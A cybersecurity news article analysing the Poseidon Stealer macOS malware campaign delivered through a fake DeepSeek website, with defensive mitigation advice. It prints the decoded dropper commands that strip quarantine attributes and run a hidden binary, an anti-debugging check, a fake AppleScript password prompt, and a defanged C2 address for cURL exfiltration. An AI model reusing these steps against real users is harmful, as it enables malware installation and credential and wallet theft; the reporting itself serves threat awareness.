Tuesday, May 6, 2025
HomeCyber Security NewsPoseidon Stealer Targets Mac Users via Fake DeepSeek Website

Poseidon Stealer Targets Mac Users via Fake DeepSeek Website

Published on

SIEM as a Service

Follow Us on Google News

Cybersecurity researchers uncovered a sophisticated malware campaign targeting macOS users through a fraudulent DeepSeek.ai interface.

Dubbed “Poseidon Stealer,” this information-stealing malware employs advanced anti-analysis techniques and novel infection vectors to bypass Apple’s latest security protocols, marking a significant escalation in macOS-focused threats.

Infection Vector and Social Engineering Tactics

The attack begins with malvertising campaigns redirecting users to deepseek.exploreio[.]net, a near-perfect replica of the legitimate DeepSeek.ai platform.

- Advertisement - Google News
Fake DeepSeek site
Fake DeepSeek site

 

Unsuspecting victims clicking the “Start Now” button trigger a download sequence for a malicious disk image file named DeepSeek_v.[0-9].[0-9]{2}.dmg hosted on manyanshe[.]com.

 Alternate payload delivery via terminal command
 Alternate payload delivery via terminal command

Upon mounting the DMG, users encounter instructions to drag a file labeled “DeepSeek.file” into Terminal for installation.

This technique exploits macOS’s shell script execution permissions, bypassing GateKeeper protections enhanced in macOS Sequoia that previously blocked unsigned applications via traditional launch methods. 

eSentire analysts note this Terminal-based execution method represents an emerging trend among macOS threat actors: “The shift towards command-line interface abuse reflects adversaries’ adaptation to tightened security controls in recent Apple updates”.

Anti-debug via ptrace()
Anti-debug via ptrace()

Technical Analysis of Payload Execution

The shell script (DeepSeek.file) employs multi-stage Base64 encoding to obscure its malicious intent. When decoded, the script performs:

cp "/Volumes/DeepSeek/.DeepSeek" "/tmp/.DeepSeek"

xattr -c "/tmp/.DeepSeek"

chmod +x "/tmp/.DeepSeek"

/tmp/.DeepSeek

This sequence copies the malware binary to a temporary directory, strips security attributes, grants execution privileges, and launches the payload.

The stealer incorporates multiple anti-debugging measures, including:

  1. PT_DENY_ATTACH via ptrace() to block debugger attachment
  2. sysctl() Process Tracing Checks monitoring for P_TRACED flags
  3. Username Blocklisting targeting researchers (“maria”, “jackiemac”, etc.)1
if ((kp_proc.p_flag & P_TRACED) != 0) {

    exit(1);

}

Data Exfiltration Capabilities

Poseidon exhibits comprehensive data harvesting capabilities, targeting:

  • Browser Data: Cookies, passwords, credit cards from Chrome/Firefox
  • Cryptocurrency Wallets: Private keys from Ledger Live, Trezor Suite, Electrum
  • Documents: TXT, PDF, DOCX files from Desktop/Documents
  • Keychain: Full export of /Library/Keychains/login.keychain-db

A deceptive password prompt validates credentials via AppleScript before proceeding with data collection:

Display dialog “macOS needs your password to continue…” default answer “” with hidden answer

Password dialog
Password dialog

All exfiltrated data gets compressed and transferred via cURL to 82.115.223[.]9/contact using POST requests. 

 Harvested files ready for exfil
 Harvested files ready for exfil

Security teams analyzing intercepted payloads observed structured archive formats containing separate directories for browser data, financial documents, and system metadata.

Mitigation Strategies

Organizations should implement:

  1. User education on unexpected Terminal usage during software installation
  2. Endpoint detection rules monitoring osascript execution chains
  3. Network filtering for connections to the identified C2 IP
  4. Regular audits of browser extensions and cryptocurrency wallet applications

The emergence of macOS-specific malware-as-a-service offerings like Poseiden Stealer highlights the growing profitability of Apple ecosystem attacks.

With threat actors investing in advanced macOS reverse engineering capabilities, security teams must prioritize monitoring unconventional execution patterns even on traditionally “secure” platforms.

Free Webinar: Better SOC with Interactive Malware Sandbox for Incident Response, and Threat Hunting - Register Here

Divya
Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.

Latest articles

Darcula PhaaS: 884,000 Credit Card Details Stolen from 13 Million Global User Clicks

The Darcula group has orchestrated a massive phishing-as-a-service (PhaaS) operation, dubbed Magic Cat, compromising...

Microsoft Resolves Group Policy Issue Blocking Windows 11 24H2 Installation

Microsoft has resolved a critical enterprise-focused bug that blocked organizations from deploying Windows 11...

DragonForce Ransomware Targets Major UK Retailers, Including Harrods, Marks & Spencer, and Co-Op

Major UK retailers including Harrods, Marks and Spencer, and Co-Op are currently experiencing significant...

OpenAI Shifts For-Profit Branch to Public Benefit Corporation, Staying Under Nonprofit Oversight

Landmark organizational shift, OpenAI announced its transition from a capped-profit LLC to a Public...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

Darcula PhaaS: 884,000 Credit Card Details Stolen from 13 Million Global User Clicks

The Darcula group has orchestrated a massive phishing-as-a-service (PhaaS) operation, dubbed Magic Cat, compromising...

Microsoft Resolves Group Policy Issue Blocking Windows 11 24H2 Installation

Microsoft has resolved a critical enterprise-focused bug that blocked organizations from deploying Windows 11...

DragonForce Ransomware Targets Major UK Retailers, Including Harrods, Marks & Spencer, and Co-Op

Major UK retailers including Harrods, Marks and Spencer, and Co-Op are currently experiencing significant...